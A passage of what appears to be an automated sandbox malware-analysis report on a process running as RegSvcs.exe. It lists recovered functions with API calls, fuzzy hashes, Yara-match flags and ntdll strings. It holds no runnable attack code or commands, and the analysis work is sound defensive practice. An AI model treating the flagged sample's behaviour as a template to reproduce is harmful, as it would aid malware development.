                                            Function 018A2D10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: da5fa15e2c8bea8f824633f376f63d82644de1a156642cf0257634839fff4dc8
                                            • Instruction ID: 2e462dc878ecbd150c9096c09ed222934a2aa6781a720de8eeacbf97d7a1bc90
                                            • Opcode Fuzzy Hash: da5fa15e2c8bea8f824633f376f63d82644de1a156642cf0257634839fff4dc8
                                            • Instruction Fuzzy Hash: D190022921340006D1807158584864A000997D2302F95E415A101A568CC9158A6D5722
                                            Function 018A2D30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 9aea45ff08788c44c649b0c24e148f1e79f757833b578fa8206debe8a1b12b7c
                                            • Instruction ID: a35df927c6f40fc26ab84bda67cb498e1826f8b4b938e3d2a6a6d6f99dd8667e
                                            • Opcode Fuzzy Hash: 9aea45ff08788c44c649b0c24e148f1e79f757833b578fa8206debe8a1b12b7c
                                            • Instruction Fuzzy Hash: 9C90022130140007D140715858586464009E7E2301F55E011E1419564CD9158A5E5723
                                            Function 018A2CA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: b99a61b2c009b7979d2a828191964db1ebb4de7e659ea0e44fbabec509815b5f
                                            • Instruction ID: 40e786307af66b9a7da6780d74093491591a6eb8a03c32679ce4757a69b9ddc9
                                            • Opcode Fuzzy Hash: b99a61b2c009b7979d2a828191964db1ebb4de7e659ea0e44fbabec509815b5f
                                            • Instruction Fuzzy Hash: DB90023120140406D10075985848686000997E1301F55E011A6029565EC6658A996632
                                            Function 018A2C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: b291961c31e23fb53547dce9cadc69a4776644cc0a59da690217e939024793f6
                                            • Instruction ID: 4e8744d45e29dc7718866da75bbb5a539dced16293bf287aebbfc5625fab11f2
                                            • Opcode Fuzzy Hash: b291961c31e23fb53547dce9cadc69a4776644cc0a59da690217e939024793f6
                                            • Instruction Fuzzy Hash: 6290023120148806D1107158884478A000997D1301F59D411A5429668DC6958A997622
                                            Function 018A2F90 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 4d1810f2fd4ee5aa21d982251bb00b8e7ba291af5217e39b83fa0c775b6fd74b
                                            • Instruction ID: 6a0da59503dc9c6ac0f2ea1d8995925a6936f7f53f741efdf0a5f523952a87ff
                                            • Opcode Fuzzy Hash: 4d1810f2fd4ee5aa21d982251bb00b8e7ba291af5217e39b83fa0c775b6fd74b
                                            • Instruction Fuzzy Hash: 2790023120180406D10071584C5474B000997D1302F55D011A2169565DC6258A596A72
                                            Function 018A2FB0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: feee6b708ad6c82c67830ad67633f4d4ab563eb32e85d0bf2bb0efe057e7e3c1
                                            • Instruction ID: 73817803902f14d5a9da092b51401f8c99fadb764405b8a99700725588f8e946
                                            • Opcode Fuzzy Hash: feee6b708ad6c82c67830ad67633f4d4ab563eb32e85d0bf2bb0efe057e7e3c1
                                            • Instruction Fuzzy Hash: AC90022160140046414071688C849464009BBE2311755D121A199D560DC5598A6D5B66
                                            Function 018A2FE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: b05251befa2f165bdc8518c16b354ff5b189139a84a8f3208ad2873f672f64ac
                                            • Instruction ID: 08b6df357c573eeb9f4257ad32672b0af59d0b12c1bedfc3cf5d03db4fa175c5
                                            • Opcode Fuzzy Hash: b05251befa2f165bdc8518c16b354ff5b189139a84a8f3208ad2873f672f64ac
                                            • Instruction Fuzzy Hash: 33900221211C0046D20075684C54B47000997D1303F55D115A1159564CC9158A695A22
                                            Function 018A2F30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 408c01b55724bfbe1ad41e6ae1cf02a77f0a07c6261db834ff038f27a568eb4c
                                            • Instruction ID: dd38998439b02301ac736be90c0ff5df40d102d8584912a6ffe237dc2f08667a
                                            • Opcode Fuzzy Hash: 408c01b55724bfbe1ad41e6ae1cf02a77f0a07c6261db834ff038f27a568eb4c
                                            • Instruction Fuzzy Hash: C190026134140446D10071584854B460009D7E2301F55D015E2069564DC619CE5A6627
                                            Function 018A2E80 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 59dae94a2d46c2972b4d7f9f216c15f29656ae6e6fccffac3d8e7cef746139e3
                                            • Instruction ID: b280621807846a3e18efc8b2b5cc9459a92b91932851ca6c277b44a7ac7113a5
                                            • Opcode Fuzzy Hash: 59dae94a2d46c2972b4d7f9f216c15f29656ae6e6fccffac3d8e7cef746139e3
                                            • Instruction Fuzzy Hash: EA90022160140506D10171584844656000E97D1341F95D022A2029565ECA258B9AA632
                                            Function 018A2EA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 13c16656afe9707267f4dc34ad1f76fd07e5313356e822f4b3dd75c0c66e86c1
                                            • Instruction ID: e7751a25828bc7c7463bdc5a5f91970034cb361c79b0d60c22706c2a4ee5795e
                                            • Opcode Fuzzy Hash: 13c16656afe9707267f4dc34ad1f76fd07e5313356e822f4b3dd75c0c66e86c1
                                            • Instruction Fuzzy Hash: 6B90027120140406D14071584844786000997D1301F55D011A6069564EC6598FDD6B66
                                            Function 00409AB0 Relevance: .1, Instructions: 92COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2215419280.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_400000_RegSvcs.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: bf70d19deb8b7dbf65a1c14f2d3141162741e3067e6603a799ea80fa30cdc1c2
                                            • Instruction ID: 0b46cc9625fd597f0f1293e0fe630cc8c1f9f1e3f005c30533d49d025d22dd75
                                            • Opcode Fuzzy Hash: bf70d19deb8b7dbf65a1c14f2d3141162741e3067e6603a799ea80fa30cdc1c2
                                            • Instruction Fuzzy Hash: 97210AB2D4020857CB25D674AD52BFF73BCAB54314F04007FE949A3182F638BE498BA5
                                            Function 0041A630 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 6 41a630-41a661 call 41af60 RtlAllocateHeap
                                            APIs
                                            • RtlAllocateHeap.NTDLL(6EA,?,00414CAF,00414CAF,?,00414536,?,?,?,?,?,00000000,00409CF3,?), ref: 0041A65D
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2215419280.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_400000_RegSvcs.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: AllocateHeap
                                            • String ID: 6EA
                                            • API String ID: 1279760036-1400015478
                                            • Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                            • Instruction ID: b63900df46c74d48569035b2bcc9be016157083d4ef88d1b541c797289a4eec1
                                            • Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                            • Instruction Fuzzy Hash: 46E012B1200208ABDB14EF99CC41EA777ACEF88664F158559BA085B242C630F9118AB0
                                            Function 0041A6AB Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 19memoryCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 9 41a6ab-41a6ac 11 41a64c-41a661 RtlAllocateHeap 9->11 12 41a647 call 41af60 9->12 12->11
                                            APIs
                                            • RtlAllocateHeap.NTDLL(6EA,?,00414CAF,00414CAF,?,00414536,?,?,?,?,?,00000000,00409CF3,?), ref: 0041A65D
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2215419280.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_400000_RegSvcs.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: AllocateHeap
                                            • String ID: 6EA
                                            • API String ID: 1279760036-1400015478
                                            • Opcode ID: 765c4e68831acc91f9fb08e760deeabccbeb69a3863e01e0beb469382330cd47
                                            • Instruction ID: ca5c2ad009bb5830261af26d6cd8d5f5f20ef4a650c85af14dc2c9a9921a2f81
                                            • Opcode Fuzzy Hash: 765c4e68831acc91f9fb08e760deeabccbeb69a3863e01e0beb469382330cd47
                                            • Instruction Fuzzy Hash: 32D02BF91092845FD700DF74DD808DB7754AF85318738844EF84D03303C130D426A6B2
                                            Function 00408308 Relevance: 1.6, APIs: 1, Instructions: 56threadwindowCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 215 408308-40835a call 41be60 call 41ca00 call 40acf0 call 414e50 224 40835c-40836e PostThreadMessageW 215->224 225 40838e-408392 215->225 226 408370-40838a call 40a480 224->226 227 40838d 224->227 226->227 227->225
                                            APIs
                                            • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040836A
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2215419280.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_400000_RegSvcs.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: MessagePostThread
                                            • String ID:
                                            • API String ID: 1836367815-0
                                            • Opcode ID: aaf447e7e3095c17f08ce8e9d0f214d310877f86eeb7b00165297c6954b8b0b0
                                            • Instruction ID: deec3d3271cf7ae617df0fac63ab8d80f0a55d98960cf64c01aa098855739ce5
                                            • Opcode Fuzzy Hash: aaf447e7e3095c17f08ce8e9d0f214d310877f86eeb7b00165297c6954b8b0b0
                                            • Instruction Fuzzy Hash: DE01B531A8032976E721A6A59C43FEE772CAB41B54F14015EFE04BA1C2E6A8690547EA
                                            Function 00408310 Relevance: 1.6, APIs: 1, Instructions: 55threadwindowCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 230 408310-40831f 231 408328-40835a call 41ca00 call 40acf0 call 414e50 230->231 232 408323 call 41be60 230->232 239 40835c-40836e PostThreadMessageW 231->239 240 40838e-408392 231->240 232->231 241 408370-40838a call 40a480 239->241 242 40838d 239->242 241->242 242->240
                                            APIs
                                            • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040836A
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2215419280.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_400000_RegSvcs.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: MessagePostThread
                                            • String ID:
                                            • API String ID: 1836367815-0
                                            • Opcode ID: eeb461d9a93cfa80389428809ed4c10d2a707c26e4e5d313531af448f679d8da
                                            • Instruction ID: fe648ddaccc693dff6b318d6e20673cc1517f8ca6da234ac2c2ad493b9bfa733
                                            • Opcode Fuzzy Hash: eeb461d9a93cfa80389428809ed4c10d2a707c26e4e5d313531af448f679d8da
                                            • Instruction Fuzzy Hash: FF018431A8032C76E721A6959C43FFE776C5B40F54F05011AFF04BA1C2EAA8690546EA
                                            Function 0041A7C2 Relevance: 1.5, APIs: 1, Instructions: 44COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 260 41a7c2-41a7c9 261 41a7a3-41a7c0 260->261 262 41a7cb-41a7ea call 41af60 260->262 265 41a7ef-41a804 LookupPrivilegeValueW 262->265
                                            APIs
                                            • LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1D2,0040F1D2,0000003C,00000000,?,00409D65), ref: 0041A800
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2215419280.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_400000_RegSvcs.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: LookupPrivilegeValue
                                            • String ID:
                                            • API String ID: 3899507212-0
                                            • Opcode ID: 68a7fb53f19db8fc4b0122ea7caf60be0d3c4a228c37affc46d7d3906d4fc120
                                            • Instruction ID: 23f3b5c59c3bf1b946c484d1dd1b09d9bbd519211ec81ee406c7880a26dda3c9
                                            • Opcode Fuzzy Hash: 68a7fb53f19db8fc4b0122ea7caf60be0d3c4a228c37affc46d7d3906d4fc120
                                            • Instruction Fuzzy Hash: 4CF022B62002086BDB10DFA9DC80EE73369EF89720F04864AFD1C47281C534E8158BB0
                                            Function 0041A670 Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 277 41a670-41a6a1 call 41af60 RtlFreeHeap
                                            APIs
                                            • RtlFreeHeap.NTDLL(00000060,00409CF3,?,?,00409CF3,00000060,00000000,00000000,?,?,00409CF3,?,00000000), ref: 0041A69D
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2215419280.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_400000_RegSvcs.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: FreeHeap
                                            • String ID:
                                            • API String ID: 3298025750-0
                                            • Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                            • Instruction ID: 086aab0bc8c344d6c60c9bbd5a0512cabfd8005857d16272e4a7e29987098a06
                                            • Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                            • Instruction Fuzzy Hash: C1E012B1200208ABDB18EF99CC49EA777ACEF88764F118559BA085B242C630E9108AB0
                                            Function 0041A7D0 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                            Download Yara Rule
                                            APIs
                                            • LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1D2,0040F1D2,0000003C,00000000,?,00409D65), ref: 0041A800
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2215419280.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_400000_RegSvcs.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: LookupPrivilegeValue
                                            • String ID:
                                            • API String ID: 3899507212-0
                                            • Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                            • Instruction ID: 3f9aab8e47c10174471559fee5d267dc63a882ce56825bdd12c8e63267ac542a
                                            • Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                            • Instruction Fuzzy Hash: 23E01AB12002086BDB10DF49CC85EE737ADEF88654F118155BA0C57241C934E8118BF5
                                            Function 0041A6B0 Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                            Download Yara Rule
                                            APIs
                                            • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A6D8
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2215419280.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_400000_RegSvcs.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: ExitProcess
                                            • String ID:
                                            • API String ID: 621844428-0
                                            • Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                            • Instruction ID: 671013aba82168957284564a3a9f05bc2528e3e40ec9789e05460755300894f7
                                            • Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                            • Instruction Fuzzy Hash: 68D017726002187BD620EB99CC85FD777ACDF48BA4F1580A9BA1C6B242C531BA108AE1
                                            Function 018A2C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 3e1e99cafa39d71fecc10e5af6958517371e8321510b08f282d64324b66b16b0
                                            • Instruction ID: 91e6ff77d60969ba2104efb513c3c30701053e1d2cfd39a77ba95affe8470a3a
                                            • Opcode Fuzzy Hash: 3e1e99cafa39d71fecc10e5af6958517371e8321510b08f282d64324b66b16b0
                                            • Instruction Fuzzy Hash: 2DB09B719015C5CAEA11E7644A08717790577D1701F55C061D3034651F4738C2D5E676

                                            Non-executed Functions

                                            Function 018E2349 Relevance: 26.1, Strings: 20, Instructions: 1117COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                            • API String ID: 0-2160512332
                                            • Opcode ID: 351dbd1d1f9626c983c490a91a4bd5b3402c6457c3fb2d37faae8cb2803bddc2
                                            • Instruction ID: a306e328559e54c3a75135fb65861319b4abcdb848c54d2aac584846828c809d
                                            • Opcode Fuzzy Hash: 351dbd1d1f9626c983c490a91a4bd5b3402c6457c3fb2d37faae8cb2803bddc2
                                            • Instruction Fuzzy Hash: 0C92DF71608346AFE721DF28C888F6BB7EABB85714F04481DFA94D7251D770EA44CB92
                                            Function 01898620 Relevance: 17.7, Strings: 14, Instructions: 223COMMON
                                            Download Yara Rule
                                            Strings
                                            • corrupted critical section, xrefs: 018D54C2
                                            • Thread is in a state in which it cannot own a critical section, xrefs: 018D5543
                                            • Critical section address., xrefs: 018D5502
                                            • 8, xrefs: 018D52E3
                                            • Critical section address, xrefs: 018D5425, 018D54BC, 018D5534
                                            • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 018D54CE
                                            • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 018D54E2
                                            • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 018D540A, 018D5496, 018D5519
                                            • Critical section debug info address, xrefs: 018D541F, 018D552E
                                            • undeleted critical section in freed memory, xrefs: 018D542B
                                            • Address of the debug info found in the active list., xrefs: 018D54AE, 018D54FA
                                            • Thread identifier, xrefs: 018D553A
                                            • double initialized or corrupted critical section, xrefs: 018D5508
                                            • Invalid debug info address of this critical section, xrefs: 018D54B6
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                            • API String ID: 0-2368682639
                                            • Opcode ID: 5f7ce4c2c4ce2ca8599f2f6b9c6ffe527bdae050c908494a625a08491950a001
                                            • Instruction ID: 0620eb73e289c4cf88dfec7b7694b7e7b82cf28ac8661c07c1df2ec276af675f
                                            • Opcode Fuzzy Hash: 5f7ce4c2c4ce2ca8599f2f6b9c6ffe527bdae050c908494a625a08491950a001
                                            • Instruction Fuzzy Hash: 8481ACB1A41349EFDB21CF99C884BAEBBB5FB0AB14F14411AF505F7240D775AA40CB90
                                            Function 018929F9 Relevance: 14.2, Strings: 11, Instructions: 411COMMON
                                            Download Yara Rule
                                            Strings
                                            • SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 018D2412
                                            • SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 018D2624
                                            • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 018D2506
                                            • SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 018D24C0
                                            • SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 018D2602
                                            • @, xrefs: 018D259B
                                            • RtlpResolveAssemblyStorageMapEntry, xrefs: 018D261F
                                            • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 018D25EB
                                            • SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 018D22E4
                                            • SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 018D2498
                                            • SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 018D2409
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
                                            • API String ID: 0-4009184096
                                            • Opcode ID: 64bc95636d0c7f0b2cbcb59579e3e37647f51c9ce88a81ee198f053bd6c5eb10
                                            • Instruction ID: c58adea46d63e78393972b58942c742d72fe13ba4dc6b140fe64dea789b2f32a
                                            • Opcode Fuzzy Hash: 64bc95636d0c7f0b2cbcb59579e3e37647f51c9ce88a81ee198f053bd6c5eb10
                                            • Instruction Fuzzy Hash: 610250B1D00269AFDF31DB58CC80B9AB7B9AF54318F4441DAA609E7241EB709F84CF59
                                            Function 01908B42 Relevance: 12.6, Strings: 10, Instructions: 146COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
                                            • API String ID: 0-2515994595
                                            • Opcode ID: d6eda908af9c886a02d00bba650c8a50af6c2113c836608e2b637a688208027d
                                            • Instruction ID: 3796c00efc7fabe2329871ceacf7892311533be66528b867f9b07facc6e8e944
                                            • Opcode Fuzzy Hash: d6eda908af9c886a02d00bba650c8a50af6c2113c836608e2b637a688208027d
                                            • Instruction Fuzzy Hash: FB518EB1A04315AFD726DF188844BABBBECAF94750F144A1DEA9DC2281E770D609C792
                                            Function 01910274 Relevance: 10.3, Strings: 8, Instructions: 348COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
